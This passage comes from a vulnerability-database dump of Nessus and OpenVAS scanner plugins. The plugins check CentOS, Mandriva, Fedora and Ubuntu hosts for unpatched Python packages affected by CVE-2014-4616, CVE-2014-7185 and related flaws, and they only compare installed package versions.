value:\"http://www.nessus.org/u?2883d9e8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7185\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:39", "description": "Updated python and python-simplejson package fixes security\nvulnerability\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been\npatched to fix the bug.", "edition": 25, "published": "2014-07-11T00:00:00", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:135)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616"], "modified": "2014-07-11T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python-simplejson", "p-cpe:/a:mandriva:linux:lib64python-devel"], "id": "MANDRIVA_MDVSA-2014-135.NASL", "href": "https://www.tenable.com/plugins/nessus/76471", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:135. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76471);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"MDVSA\", value:\"2014:135\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:135)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python and python-simplejson package fixes security\nvulnerability\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been\npatched to fix the bug.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0286.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-simplejson-2.3.3-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.7.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-03-03T20:57:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "Check the version of python3", "modified": "2020-03-02T00:00:00", "published": "2014-11-10T00:00:00", "id": "OPENVAS:1361412562310868464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868464", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-14245", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14245\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868464\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-10 05:10:57 +0100 (Mon, 10 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14245\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~18.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-21T00:00:00", "id": "OPENVAS:1361412562310867978", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867978", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-8035", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-8035\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867978\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 12:28:02 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python3 FEDORA-2014-8035\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-8035\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135423.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~9.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-21T00:00:00", "id": "OPENVAS:1361412562310867987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867987", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7772", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7772\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867987\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 14:23:39 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7772\");\n script_tag(name:\"affected\", value:\"python on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7772\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135433.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-03T20:56:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4238", "CVE-2014-4650"], "description": "Check the version of python", "modified": "2020-03-02T00:00:00", "published": "2014-11-23T00:00:00", "id": "OPENVAS:1361412562310868512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868512", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-14266", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-14266\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868512\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-23 06:45:08 +0100 (Sun, 23 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python FEDORA-2014-14266\");\n script_tag(name:\"summary\", value:\"Check the version of python\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14266\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144826.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~15.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-06-26T00:00:00", "id": "OPENVAS:1361412562310842261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842261", "type": "openvas", "title": "Ubuntu Update for python2.7 USN-2653-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for python2.7 USN-2653-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842261\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-26 06:25:01 +0200 (Fri, 26 Jun 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for python2.7 USN-2653-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python2.7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that multiple Python\nprotocol libraries incorrectly limited certain data when connecting to servers.\nA malicious ftp, http, imap, nntp, pop or smtp server could use this issue to\ncause a denial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking\ngzip-compressed HTTP bodies. A malicious server could use this issue to\ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain\nargument. An attacker could possibly use this issue to read arbitrary\nmemory and expose sensitive information. This issue only affected Ubuntu\n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this issue\nto expose sensitive information, or possibly execute arbitrary code. This\nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only affected\nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)\");\n script_tag(name:\"affected\", value:\"python2.7 on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2653-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2653-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 